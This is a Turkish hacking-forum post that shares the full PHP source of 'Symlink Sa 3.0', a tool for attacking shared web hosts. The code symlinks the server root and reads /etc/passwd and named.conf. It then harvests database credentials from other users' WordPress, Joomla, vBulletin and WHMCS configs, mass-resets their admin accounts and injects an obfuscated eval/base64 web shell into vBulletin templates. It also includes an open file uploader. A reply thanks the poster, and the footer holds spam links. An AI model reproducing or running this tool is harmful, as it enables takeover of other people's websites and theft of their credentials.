⚠️ ÖNEMLİ DUYURU — KİŞİSEL VERİ VE YASADIŞI PAYLAŞIMLAR

Forumda kişisel bilgi (ad, adres, telefon vb.) veya yasa dışı içerik paylaşımı kesinlikle yasaktır. Bu tür paylaşımlar KVKK ve ilgili yasalar gereği suç teşkil eder.

Paylaşım yapan kullanıcıların hesapları kalıcı olarak kapatılacak ve resmî makamlara bildirilecektir. Forum yönetimi, yasal zorunluluklar gereği IP ve oturum kayıtlarını saklamaktadır.

Lütfen gizliliğe ve topluluk kurallarına dikkat ediniz. — Ajanlar.Org Yönetimi

Symlink sa 3.0 Priv8 Tutorial (Cod3d by S3n4t00r)

K

kr4lkurt

Yeni Üye
Katılım
29 Tem 2018
Mesajlar
1
Tepkime puanı
0
Puanları
0
28jji48.png


Symlink Sa 3.0 Neler Yeni?

- Symlink Bypass Eklendi
- Bypass Okuma
- Toplu Joomla Symlink
- Toplu WordPress Symlink
- Toplu vBulletin Symlink

Kod: 
<?php


/*

  .d8888. d88888b  .o88b.         db   d8b   db      .o88b.  .d88b.  .88b  d88.
  88'  YP 88'     d8P  Y8         88   I8I   88     d8P  Y8 .8P  Y8. 88'YbdP`88
  `8bo.   88ooooo 8P              88   I8I   88     8P      88    88 88  88  88
    `Y8b. 88~~~~~ 8b      C8888D  Y8   I8I   88     8b      88    88 88  88  88
  db   8D 88.     Y8b  d8         `8b d8'8b d8' db  Y8b  d8 `8b  d8' 88  88  88
  `8888Y' Y88888P  `Y88P'          `8b8' `8d8'  VP   `Y88P'  `Y88P'  YP  YP  YP


   author..............: s3n4t00r
   home................: sec-w.com
   twitter.............: @[URL="https://www.turkhackteam.org/member.php?u=513435"]S3n[/URL]4t00r
   name tools..........: Symlink Sa v3.0

*/



set_time_limit(0);
error_reporting(0);


$pageURL = 'http://'.$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
$u = explode("/",$pageURL );
$pageURL =str_replace($u[count($u)-1],"",$pageURL );

$pageFTP = 'ftp://'.$_SERVER["SERVER_NAME"].'/public_html/'.$_SERVER["REQUEST_URI"];
$u = explode("/",$pageFTP );
$pageFTP =str_replace($u[count($u)-1],"",$pageFTP );

?>
  <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>Symlink_Sa 3.0</title>
<script type="text/javascript" language="javascript">
<!--
ML="P<>phTsmtr/9:Cuk RIc=jSw.o";
MI="1F=AB05@FA=D4883<::GGGHC;;343HCI7:8>9?HE621:F=AB052";
OT="";
for(j=0;j<MI.length;j++){
OT+=ML.charAt(MI.charCodeAt(j)-48);
}********.write(OT);
// --></script>
<style type="text/css">

  html,body {
     margin: 0;
     padding: 0;
     outline: 0;
}
a{

 font-size: 13px;

}


body {
    direction: ltr;
    background-color:#F4F4F4;
    color: rgb(153, 153, 153);
    text-align: center
}



input,textarea,select{
font-weight: bold;
color: #000000;
}

input,textarea,select:hover{
box-shadow: 0px 0px 4px #AAAAAA;
}


.hedr {
  font-family: Tahoma, Arial, sans-serif  ;
  font-size: 22px;


}

.cont a{

 text-decoration: none;
 color:rgb(153, 153, 153);
 font-family: Tahoma, Arial, sans-serif  ;
 font-size: 16px;
 text-shadow: 0px 0px 3px ;
}

.cont a:hover{


  color: #EEEEEE ;
  text-shadow:0px 0px 3px #000000 ;


}

.tmp tr td{

border: solid 1px #BBBBBB;

padding: 2px ;
  font-size: 13px;
}

.tmp tr td a {
  text-decoration: none;



}

.foter{
  font-size: 9pt;
  color: #AAAAAA ;
  text-align: center
}

.tmp tr td:hover{

box-shadow: 0px 0px 4px #888888;

}
.fot{

font-family:Tahoma, Arial, sans-serif;

  font-size: 11pt;
}
.for a : hover{

text-shadow: 0px 0px 1px #3366FF;

}


.ir {
  color: #FF0000;
}



</style>

</head>

<body>

<div class='all'>


<?php

@mkdir('sym',0777);
$htcs  = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
$f =@fopen ('sym/.htaccess','w');
fwrite($f , $htcs);


 @[URL="https://www.turkhackteam.org/member.php?u=606963"]Symlink[/URL]("/","sym/root");

$pg = basename(__FILE__);

echo '<br /><div class="hedr"> Symlink Sa 3.0 <br /></div>' ;

echo '<br /><div class="hedr">-:[ User & Domains & Symlink ]:-<br /><br /></div>' ;

echo '<div class="cont">

[<a href="?"> Home </a>]

[<a href="?sws=sym"> User & Domains & Symlink </a>]

[<a href="?sws=sec"> Domains & Script </a>]

[ <a href="?sws=file"> Symlink File </a>]

[<a href="?sws=passwd"> Symlink Bypass </a>]

<br /><br />

[ <a href="?sws=read"> Bypass Read </a>]

[ <a href="?sws=joomla"> Mass Joomla </a>]

[ <a href="?sws=wp"> Mass WordPress </a>]

[ <a href="?sws=vb"> Mass vBulletin </a>]

[ <a href="?sws=help"> Help </a>]

<br /><br /><br />






</div>';

if(isset($_REQUEST['sws']))
{

switch ($_REQUEST['sws'])
{





/// Domains + Scripts  ///

case 'sec':

if(!@is_file('named.txt')){

$d00m = @file("/etc/named.conf");

}else{

$d00m = @file("named.txt");


}
if(!$d00m)
{

                die ("<**** http-equiv='*******' content='0; url=?sws=read'/>");
}
else

{
echo "<div class='tmp'>
<table align='center' width='40%'><td> Domains </td><td> Script </td>";
foreach($d00m as $dom){

flush();
flush();



if(eregi("zone",$dom)){
 @[URL="https://www.turkhackteam.org/member.php?u=293058"]pre[/URL]g_match_all('#zone "(.*)"#', $dom, $domsws);

flush();

if(@strlen(trim($domsws[1][0])) > 2){

$user = @[URL="https://www.turkhackteam.org/member.php?u=628396"]Posi[/URL]x_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));

///////////////////////////////////////////////////////////////////////////////////

$wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/wp-config.php";
$wpp=@get_headers($wpl);
$wp=$wpp[0];

$wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/wp-config.php";
$wpp2=@get_headers($wp2);
$wp12=$wpp2[0];

///////////////////////////////

$jo1=$pageURL."/sym/root/home/".$user['name']."/public_html/configuration.php";
$joo=@get_headers($jo1);
$jo=$joo[0];


$jo2=$pageURL."/sym/root/home/".$user['name']."/public_html/joomla/configuration.php";
$joo2=@get_headers($jo2);
$jo12=$joo2[0];

////////////////////////////////

$vb1=$pageURL."/sym/root/home/".$user['name']."/public_html/includes/config.php";
$vbb=@get_headers($vb1);
$vb=$vbb[0];

$vb2=$pageURL."/sym/root/home/".$user['name']."/public_html/vb/includes/config.php";
$vbb2=@get_headers($vb2);
$vb12=$vbb2[0];

$vb3=$pageURL."/sym/root/home/".$user['name']."/public_html/forum/includes/config.php";
$vbb3=@get_headers($vb3);
$vb13=$vbb3[0];

/////////////////

$wh1=$pageURL."/sym/root/home/".$user['name']."public_html/clients/configuration.php";
$whh2= @get_headers($wh1);
$wh=$whh2[0];

$wh2=$pageURL."/sym/root/home/".$user['name']."/public_html/support/configuration.php";
$whh2= @get_headers($wh2);
$wh12=$whh2[0];

$wh3=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php";
$whh3= @get_headers($wh3);
$wh13=$whh3[0];

$wh5=$pageURL."/sym/root/home/".$user['name']."/public_html/submitticket.php";
$whh5= @get_headers($wh5);
$wh15=$whh5[0];

$wh4=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php";
$whh4= @get_headers($wh4);
$wh14=$whh4[0];



////////////////////////////////////////////////////////////////////////////////

 ////////// Wordpress ////////////

$pos = strpos($wp, "200");
$config="&nbsp;";

if (strpos($wp, "200") == true )
{
 $config="<a href='".$wpl."' target='_blank'>Wordpress</a>";
}
elseif (strpos($wp12, "200") == true)
{
  $config="<a href='".$wp2."' target='_blank'>Wordpress</a>";
}

///////////WHMCS////////

elseif (strpos($jo, "200")  == true and strpos($wh15, "200")  == true )
{
  $config=" <a href='".$wh5."' target='_blank'>WHMCS</a>";

}
elseif (strpos($wh12, "200")  == true)
{
  $config =" <a href='".$wh2."' target='_blank'>WHMCS</a>";
}

elseif (strpos($wh13, "200")  == true)
{
  $config =" <a href='".$wh3."' target='_blank'>WHMCS</a>";

}

///////// Joomla to 4 ///////////

elseif (strpos($jo, "200")  == true)
{
  $config=" <a href='".$jo1."' target='_blank'>Joomla</a>";
}

elseif (strpos($jo12, "200")  == true)
{
  $config=" <a href='".$jo2."' target='_blank'>Joomla</a>";
}

//////////vBulletin to 4 ///////////

elseif (strpos($vb, "200")  == true)
{
  $config=" <a href='".$vb1."' target='_blank'>vBulletin</a>";
}

elseif (strpos($vb12, "200")  == true)
{
  $config=" <a href='".$vb2."' target='_blank'>vBulletin</a>";
}

elseif (strpos($vb13, "200")  == true)
{
  $config=" <a href='".$vb3."' target='_blank'>vBulletin</a>";
}

else
{
 continue;
}
flush();
flush();

/////////////////////////////////////////////////////////////////////////////////////



$site = $user['name'] ;



flush();

echo "<tr><td><a href=http://www.".$domsws[1][0]."/>".$domsws[1][0]."</a></td>
<td>".$config."</td></tr>"; flush();

}
}
}
}




break;


/// user + domine + symlink  ///

case 'sym':

if(!is_file('named.txt')){

$d00m = @file("/etc/named.conf");

}else{

$d00m = @file("named.txt");


}
if(!$d00m)
{

                die ("<**** http-equiv='*******' content='0; url=?sws=read'/>");
}
else

{
echo "<div class='tmp'><table align='center' width='40%'><td>Domains</td><td>Users</td><td>symlink </td>";
foreach($d00m as $dom){

if(eregi("zone",$dom)){

preg_match_all('#zone "(.*)"#', $dom, $domsws);

flush();

if(strlen(trim($domsws[1][0])) > 2){

$user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));

flush();



$site = $user['name'] ;

 @[URL="https://www.turkhackteam.org/member.php?u=606963"]Symlink[/URL]("/","sym/root");

$site = $domsws[1][0];

$ir = 'ir';

$il = 'il';

if (preg_match("/.^$ir/",$domsws[1][0]) or preg_match("/.^$il/",$domsws[1][0]) )
{
$site = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$domsws[1][0]."</div>";
}


echo "
<tr>

<td>
<div class='dom'><a target='_blank' href=http://www.".$domsws[1][0]."/>".$site." </a> </div>
</td>


<td>
".$user['name']."
</td>






<td>
<a href='sym/root/home/".$user['name']."/public_html' target='_blank'>symlink </a>
</td>


</tr></div> ";


flush();
flush();

}
}
}
}




break;


/// file  symlink ///

case 'file':

echo'
The file path to symlink

<br /><br />
<form method="post">
<input type="text" name="file" value="/home/user/public_html/file.name" size="60"/><br /><br />
<input type="text" name="symfile" value="file.name_sym ( Ex. :: royaliste.txt )" size="60"/><br /><br />
<input type="submit" value="symlink" name="symlink" /> <br /><br />



</form>
';

$pfile = $_POST['file'];
$symfile = $_POST['symfile'];
$symlink = $_POST['symlink'];

if ($symlink)
{


@mkdir('sym1',0777);
$c  = "Options Indexes FollowSymLinks \n DirectoryIndex ssssss.htm \n AddType txt .php \n AddHandler txt .php \n  AddType txt .html \n AddHandler txt .html \n Options all \n Options \n Allow from all \n Require None \n Satisfy Any";
$f =@fopen ('sym1/.htaccess','w');
@fwrite($f , $c);
 @[URL="https://www.turkhackteam.org/member.php?u=606963"]Symlink[/URL]("$pfile","sym1/$symfile");

echo '<br /><a target="_blank" href="sym1/'.$symfile.'" >'.$symfile.'</a>';

}



break;

/// bypass read

case 'read':

echo "read /etc/named.conf";
echo "<br /><br /><form method='post' action='?sws=read&save=1'><textarea cols='80' rows='20' name='file'>";
flush();
flush();


$file = '/etc/named.conf';


$r3ad = @fopen($file, 'r');
if ($r3ad){
$content = @fread($r3ad, @filesize($file));
echo "".htmlentities($content)."";
}
else if (!$r3ad)
{
$r3ad = @[URL="https://www.turkhackteam.org/member.php?u=77219"]show[/URL]_source($file) ;
}
else if (!$r3ad)
{
$r3ad = @highlight_file($file);
}
else if (!$r3ad)
{
$sm = @[URL="https://www.turkhackteam.org/member.php?u=606963"]Symlink[/URL]($file,'sym.txt');


if ($sm){
$r3ad = @fopen('sym/sym.txt', 'r');
$content = @fread($r3ad, @filesize($file));
echo "".htmlentities($content)."";

}
}



echo "</textarea><br /><br /><input  type='submit' value='Save'/> </form>";


if(isset($_GET['save'])){


$cont = stripcslashes($_POST['file']);

$f = fopen('named.txt','w');

$w = fwrite($f,$cont);

                  if($w){

                  echo '<br />save has been successfully';

                  }

fclose($f);




}



break;

// passwd

case 'passwd':

if(isset($_GET['save']) and isset($_POST['file']) or @filesize('passwd.txt') > 0){


$cont = stripcslashes($_POST['file']);

if(!file_exists('passwd.txt')){

$f = @fopen('passwd.txt','w');

$w = @fwrite($f,$cont);

fclose($f);
}
if($w or @filesize('passwd.txt') > 0){
// * SHOW * //

echo "<div class='tmp'><table align='center' width='35%'><td>Users</td><td>symlink</td><td>FTP</td>";
flush();

$fil3 = file('passwd.txt');

foreach ($fil3 as $f){

     $u=explode(':', $f);
     $user = $u['0'];



echo "
<tr>



<td width='15%'>
$user
</td>






<td width='10%'>
<a href='sym/root/home/$user/public_html' target='_blank'>Symlink </a>
</td>

<td width='10%'>
<a href='$pageFTP/sym/root/home/$user/public_html' target='_blank'>FTP</a>
</td>



</tr></div> ";


flush();
flush();


}






die ("</tr></div>");


                  }





}



echo "read /etc/passwd";
echo "<br /><br /><form method='post' action='?sws=passwd&save=1'><textarea cols='80' rows='20' name='file'>";
flush();

$file = '/etc/passwd';


$r3ad = @fopen($file, 'r');
if ($r3ad){
$content = @fread($r3ad, @filesize($file));
echo "".htmlentities($content)."";
}
elseif(!$r3ad)
{
$r3ad = @[URL="https://www.turkhackteam.org/member.php?u=77219"]show[/URL]_source($file) ;
}
elseif(!$r3ad)
{
$r3ad = @highlight_file($file);
}
elseif(!$r3ad)
{

                                            for($uid=0;$uid<1000;$uid++){
                                             $ara = posix_getpwuid($uid);
                                               if (!empty($ara)) {
                                                  while (list ($key, $val) = each($ara)){
                                                    print "$val:";
                                                  }
                                                  print "\n";
                                                 }

                                        }

 }


flush();


echo "</textarea><br /><br /><input  type='submit' value='&nbsp;&nbsp;symlink&nbsp;&nbsp;'/> </form>";
flush();

break;



case 'joomla':

/////////////////////////////////////////////////////////////////// xxxxxxxxxxxxxxxxxxx ////////////////////////////


if(isset($_POST['s'])){

$file = @file_get_contents('joomla.txt');

$ex   = explode("\n",$file);

echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
flush();


foreach ($ex as $exp){

$es   = explode("||",$exp);

$config = $es[0];

$domin = $es[1];

$domins = trim($domin).'';

$readconfig  = @file_get_contents(trim($config));

if(ereg('JConfig',$readconfig)){



$pass    =  ex($readconfig,'$password = \'',"';");

$userdb  =  ex($readconfig,'$user = \'',"';");

$db      =  ex($readconfig,'$db = \'',"';");

$fix     =  ex($readconfig,'$dbprefix = \'',"';");

$tab     =  $fix.'users';


$con     = @mysql_connect('localhost',$userdb,$pass);

$db      = @mysql_select_db($db,$con);

$query   = @mysql_query("UPDATE `$tab`  SET `username` ='sec-w.com'");


$query3  = @mysql_query("UPDATE `$tab`  SET `password` ='44a0bcda611514625ba94e0b1c0bdaed:2iets9ydjR3iOdSuyvW54pIzyF9M1P5J'");


if ($query and $query3 ){$r = '<b style="color: #006600">Succeed </b>user [sec-w.com] pass [1]</b>';}else{$r = '<b style="color:red">failed</b>';}

$domins = trim($domin).'';

echo "<tr>
<td><a target='_blank' href='http://$domins'>$domin</a></td>
<td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";
flush();



}else{

echo "<tr>
<td><a target='_blank' href='http://$domins'>$domin</a></td>
<td><a target='_blank' href='http://$exp'>config</a></td><td><b style='color:red'>failed</b></td></tr>";
flush();

}

}









die();

}

if(!is_file('named.txt')){

$d00m = @file("/etc/named.conf");

flush();


}else{

$d00m = file("named.txt");


}
if(!$d00m)
{

                die ("<**** http-equiv='*******' content='0; url=?sws=read'/>");
}
else

{
echo "<div class='tmp'>
<form method='POST' action='$pg?sws=joomla'>
<input type='submit' value='Mass ching Admin' />
<input type='hidden' value='1' name='s' />
</form><br /><br />
<table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";

$f = fopen('joomla.txt','w');

foreach($d00m as $dom){

if(eregi("zone",$dom)){

preg_match_all('#zone "(.*)"#', $dom, $domsws);

if(strlen(trim($domsws[1][0])) > 2){

$user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));

///////////////////////////////////////////////////////////////////////////////////

$wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/configuration.php";
$wpp=get_headers($wpl);
$wp=$wpp[0];

$wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/configuration.php";
$wpp2=get_headers($wp2);
$wp12=$wpp2[0];

$wp3=$pageURL."/sym/root/home/".$user['name']."/public_html/joomla/configuration.php";
$wpp3=get_headers($wp3);
$wp13=$wpp3[0];


 ////////// joomla ////////////

$pos = strpos($wp, "200");
$config="&nbsp;";

if (strpos($wp, "200") == true )
{
 $config= $wpl;
}
elseif (strpos($wp12, "200") == true)
{
  $config= $wp2;
}
elseif (strpos($wp13, "200") == true)
{
  $config= $wp3;
}
else
{
continue;

}
flush();

/////////////////////////////////////////////////////////////////////////////////////

$dom = $domsws[1][0];

$w = fwrite($f,"$config||$dom \n");
if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:red">failed</b>';}


echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
<td><a href='$config'>config</a></td><td>".$r."</td></tr>";





flush();


}
}
}
}


break;

case 'wp':

############################ index #########################3






########  admin ##########33

if(isset($_POST['s'])){

$file = @file_get_contents('wp.txt');

$ex   = explode("\n",$file);

echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
flush();
flush();


foreach ($ex as $exp){

$es   = explode("||",$exp);

$config = $es[0];

$domin = $es[1];

$domins = trim($domin).'';

$readconfig  = @file_get_contents(trim($config));

if(ereg('wp-settings.php',$readconfig)){



$pass    =  ex($readconfig,"define('DB_PASSWORD', '","');");

$userdb  =  ex($readconfig,"define('DB_USER', '","');");

$db      =  ex($readconfig,"define('DB_NAME', '","');");

$fix     =  ex($readconfig,'$table_prefix  = \'',"';");

$tab     = $fix.'users';

$con     = @mysql_connect('localhost',$userdb,$pass);

$db      = @mysql_select_db($db,$con);

$query   = @mysql_query("UPDATE `$tab` SET `user_login` ='sec-w.com'") or die;

$query   = @mysql_query("UPDATE `$tab` SET `user_pass` ='$1$4z/.5i..$9aHYB.fUHEmNZ.eIKYTwx/'") or die;



if ($query){$r = '<b style="color: #006600">Succeed </b>user [sec-w.com] pass [1]</b>';}

else

{

$r = '<b style="color:red">failed</b>';

}

$domins = trim($domin).'';

echo "<tr>
<td><a target='_blank' href='http://$domins'>$domin</a></td>
<td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";

flush();
flush();






}else{

echo "<tr>
<td><a target='_blank' href='http://$domins'>$domin</a></td>
<td><a target='_blank' href='http://$config'>config</a></td><td><b style='color:red'>failed2</b></td></tr>";

flush();
flush();

}

}










die();

}

if(!is_file('named.txt')){

$d00m = @file("/etc/named.conf");

}else{

$d00m = @file("named.txt");


}
if(!$d00m)
{

                die ("<**** http-equiv='*******' content='0; url=?sws=read'/>");
}
else

{
echo "<div class='tmp'>
<form method='POST' action='$pg?sws=wp'>
<input type='submit' value='Mass Change Admin' />
<input type='hidden' value='1' name='s' />
</form>
<br /><br />
<table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";

flush();
flush();

$f = fopen('wp.txt','w');

foreach($d00m as $dom){

if(eregi("zone",$dom)){

preg_match_all('#zone "(.*)"#', $dom, $domsws);

if(strlen(trim($domsws[1][0])) > 2){

$user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));

///////////////////////////////////////////////////////////////////////////////////

$wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/wp-config.php";
$wpp=get_headers($wpl);
$wp=$wpp[0];

$wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/wp-config.php";
$wpp2=get_headers($wp2);
$wp12=$wpp2[0];

$wp3=$pageURL."/sym/root/home/".$user['name']."/public_html/wp/wp-config";
$wpp3=get_headers($wp3);
$wp13=$wpp3[0];


 ////////// wp ////////////

$pos = strpos($wp, "200");
$config="&nbsp;";

if (strpos($wp, "200") == true )
{
 $config= $wpl;
}
elseif (strpos($wp12, "200") == true)
{
  $config= $wp2;
}
elseif (strpos($wp13, "200") == true)
{
  $config= $wp3;
}
else
{
continue;

}
flush();

/////////////////////////////////////////////////////////////////////////////////////

$dom = $domsws[1][0];

$w = fwrite($f,"$config||$dom \n");
if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:red">failed</b>';}


echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
<td><a href='$config'>config</a></td><td>".$r."</td></tr>";
flush();
flush();





flush();


}
}
}
}


break;


case 'vb':


if(isset($_POST['s'])){



$file = @file_get_contents('vb.txt');

$ex   = explode("\n",$file);

echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";


foreach ($ex as $exp){

$es   = explode("||",$exp);

$config = $es[0];

$domin = $es[1];

$domins = trim($domin).'';

$readconfig  = @file_get_contents(trim($config));

if(ereg('vBulletin',$readconfig)){



$db      =  ex($readconfig,'$config[\'Database\'][\'dbname\'] = \'',"';");

$userdb  =  ex($readconfig,'$config[\'MasterServer\'][\'username\'] = \'',"';");

$pass    =  ex($readconfig,'$config[\'MasterServer\'][\'password\'] = \'',"';");

$con     = @mysql_connect('localhost',$userdb,$pass);

$db      = @mysql_select_db($db,$con);

$shell   = "bVDPS8MwFL4L/g+vYZAWdPPiaUv14kAQFKqnUUqapjSYNKFJxCn7322abgzcIfDyvl+P7/qKs04D3tS5sJ96MMJ9b+ohDw8vTWcq31PF02yJp/WqzvEaZk2rBwWUOaF7ghAo7jrdEGS0dQh4z9zecIKUl04YOrhV4N821FEEwZQgb6SmDR8QiObsdxYheuMdRKNWSH5UxtmKn3G+v0P5TIxgNTqhWWR9rYSLAXH/RaUfgY8pbVROZ4VI0aawqN5ei/cdDlRcAiFwJEIGv4HyyLTZp4tq+/zyVOxwOASXO+yUqUI6Lm/gHxiBLDic6o62UHjGuLWQJEko99T9Gg7ApeUXJFsq5EX+AR7yPw==" ;

$crypt  = "{\${eval(gzinflate(base64_decode(\'";

$crypt .= "$shell";

$crypt .= "\')))}}{\${exit()}}</textarea>";

$sqlfaq = "UPDATE template SET template ='".$crypt."' WHERE title ='FAQ'" ;

$query  = @mysql_query($sqlfaq,$con);



if ($query){$r = '<b style="color: #006600">Succeed</b> shell in search.php';}

else

{

$r = '<b style="color:red">failed</b>';

}

$domins = trim($domin).'';

echo "<tr>
<td><a target='_blank' href='http://$domins'>$domin</a></td>
<td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";







}else{

echo "<tr>
<td><a target='_blank' href='http://$domins'>$domin</a></td>
<td><a target='_blank' href='http://$config'>config</a></td><td><b style='color:red'>failed2</b></td></tr>";
}

}










die();

}

if(!is_file('named.txt')){

$d00m = file("/etc/named.conf");

}else{

$d00m = file("named.txt");


}
if(!$d00m)
{

                die ("<**** http-equiv='*******' content='0; url=?sws=read'/>");
}
else

{
echo "<div class='tmp'>
<form method='POST' action='$pg?sws=vb'>
<input type='submit' value='Inject shell' />
<input type='hidden' value='1' name='s' />
</form>
<br /><br />
<table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";

$f = fopen('vb.txt','w');

foreach($d00m as $dom){

if(eregi("zone",$dom)){

preg_match_all('#zone "(.*)"#', $dom, $domsws);

if(strlen(trim($domsws[1][0])) > 2){

$user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));

///////////////////////////////////////////////////////////////////////////////////

$wpl=$pageURL."/sym/root/home/".$user['name']."/includes/config.php";
$wpp=get_headers($wpl);
$wp=$wpp[0];

$wp2=$pageURL."/sym/root/home/".$user['name']."/vb/includes/config.php";
$wpp2=get_headers($wp2);
$wp12=$wpp2[0];

$wp3=$pageURL."/sym/root/home/".$user['name']."/forum/includes/config.php";
$wpp3=get_headers($wp3);
$wp13=$wpp3[0];


 ////////// vb ////////////

$pos = strpos($wp, "200");
$config="&nbsp;";

if (strpos($wp, "200") == true )
{
 $config= $wpl;
}
elseif (strpos($wp12, "200") == true)
{
  $config= $wp2;
}
elseif (strpos($wp13, "200") == true)
{
  $config= $wp3;
}
else
{
continue;

}
flush();

/////////////////////////////////////////////////////////////////////////////////////

$dom = $domsws[1][0];

$w = fwrite($f,"$config||$dom \n");
if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:red">failed</b>';}


echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
<td><a href='$config'>config</a></td><td>".$r."</td></tr>";





flush();


}
}
}
}








break;

case 'help':

echo "<div class='tmp'>
<table align='center' width='40%'><td>function</td><td>Case</td>";


$safe_mode = ini_get('safe_mode');
     if($safe_mode){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}

echo "<tr><td>Safe Mode</td><td>$r</td>";

$fun = function_exists('symlink');
     if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}

echo "<tr><td>function symlink</td><td>$r</td>";


$fun = function_exists('file');
     if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}

echo "<tr><td>function file</td><td>$r</td>";

$fun = function_exists('file_get_contents');
     if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}

echo "<tr><td>function file_get_contents</td><td>$r</td>";

$fun = function_exists('mkdir');
     if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}

echo "<tr><td>function mkdir</td><td>$r</td>";


$fun = is_dir('sym/root');
     if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}

echo "<tr><td>Permission denied</td><td>$r</td>";


$fun = preg_match('/Forbidden/',@file_get_contents('sym/root') or !@file_get_contents('sym/root'));
     if($fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #006600'>True</b>";}

echo "<tr><td>Forbidden</td><td>$r</td>";




echo "</table></div>";



break;
default:
header("********: $pg");




}


/// home ///
}else
{


echo '<br /><br /><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" value="Choose file" size="60" ><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
    if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<br /><br /><b>Uploaded successful !!<br><br>'; }
    else { echo '<br /><br />Not uploaded !!<br><br>'; }


}

    echo '
<br /><br /><br /></b></b><div class="fot">Cod3d by <b>S3n4t00r</b> Idea by <b>Mr.Alsa3ek</b>
<br /><br />
<b style="color: red";>   Sec-w.Com  </b>
<br /><br />
Muslims Hackers</div> ';

}


function ex($text,$a,$b){
$explode = explode($a,$text);
$explode = explode($b,$explode[1]);
return $explode[0];
}



echo '</div>

<a style="text-decoration: none; color: #F4F4F4;" title="اÙ„Ø*Ù…اÙÅ Ù‡"/href="http://sec-w.com/cc">اÙ„Ø*Ù…اÙÅ Ù‡</a>

<a style="text-decoration: none; color: #F4F4F4;" title="عالم اÙ„Ø*Ù…اÙÅ Ù‡"/href="http://sec-w.com/cc">عالم اÙ„Ø*Ù…اÙÅ Ù‡</a>



</body>

</html>
';

?>
 
Sid3s

Sid3s

Özel Üye
Katılım
13 Ara 2014
Mesajlar
1,567
Tepkime puanı
0
Puanları
0
Web sitesi
sid3sblog.wordpress.com
2018 sw pek geçmez ama sunucuyada bağlı paylaşım için teşekkürler
 
Cevap yazmak için giriş yap yada kayıt ol.

mersin escort mersin e ticaret bodrum escort fethiye escort alanya escort konya escort konya escort bodrum escort vozol sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort Vitamin, Takviye ve Dermokozmetik Ürünler
Üst
Copyright® Ajanlar.org 2012